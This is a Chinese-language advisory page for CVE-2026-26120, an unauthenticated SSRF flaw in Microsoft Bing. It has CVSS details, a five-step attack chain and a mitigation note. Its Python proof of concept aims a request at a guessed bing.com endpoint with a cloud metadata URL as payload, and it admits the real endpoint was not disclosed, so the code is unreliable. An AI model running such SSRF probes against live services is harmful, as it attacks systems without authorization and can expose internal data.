CVE-2026-26120 CVSS 6.5 中危

CVE-2026-26120 Microsoft Bing服务端请求伪造漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26120

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Microsoft Bing

漏洞概述

Microsoft Bing存在服务端请求伪造（SSRF）漏洞。未经身份验证的攻击者可利用该漏洞通过网络发起请求，导致机密性低程度受损及可用性低程度受损，并可能对网络资源进行篡改。

技术细节

该漏洞源于Microsoft Bing未能正确处理用户提供的URL输入。攻击者无需交互即可向目标系统发送特制的数据包，诱导服务器向攻击者控制的内网或外网资源发起请求。由于CVSS向量显示无需认证（PR:N），攻击门槛较低。攻击者可利用此漏洞扫描内网端口、读取本地元数据服务（如cloud metadata）或利用服务器权限进行中间人攻击。尽管CVSS完整性影响为无，但描述中提到的篡改可能指利用服务器身份对第三方资源执行非预期的操作。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出Microsoft Bing中存在可利用的接口，该接口接受URL参数并执行服务器端请求。

STEP 2

2. 构造Payload

攻击者构造包含恶意内部地址（如内网IP、本地元数据服务）的URL参数。

STEP 3

3. 发送请求

攻击者向Microsoft Bing发送特制的HTTP请求，无需用户交互和认证。

STEP 4

4. 执行SSRF

Bing服务器解析请求并向攻击者指定的内部目标发起连接。

STEP 5

5. 数据泄露或篡改

攻击者获取内网敏感信息（C:L），或利用Bing的网络位置对第三方服务进行干扰（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for SSRF in Microsoft Bing
# Note: This is a generic example as specific endpoints were not disclosed.

import requests

def exploit_ssrf(target_base_url, internal_url):
    """
    Attempts to send a request with a malicious URL to trigger SSRF.
    """
    # Example payload structure, actual parameter names may vary.
    payload = {
        'url': internal_url,
        'source': 'external'
    }
    
    try:
        print(f"[*] Sending SSRF request to {target_base_url} with payload: {internal_url}")
        response = requests.get(target_base_url, params=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!")
            print(f"[+] Response length: {len(response.text)}")
            print(f"[+] Response snippet: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual vulnerable endpoint and internal target
    TARGET = "https://www.bing.com/api/proxy"
    INTERNAL_TARGET = "http://169.254.169.254/latest/meta-data/" # Common metadata endpoint
    exploit_ssrf(TARGET, INTERNAL_TARGET)

影响范围

Microsoft Bing (具体受影响版本未披露)

防御指南

临时缓解措施

在未修复漏洞前，建议在网络边界部署WAF规则，检测并阻断包含内网IP地址或特定元数据路径的出站流量请求。同时监控服务器日志是否存在异常的外发连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表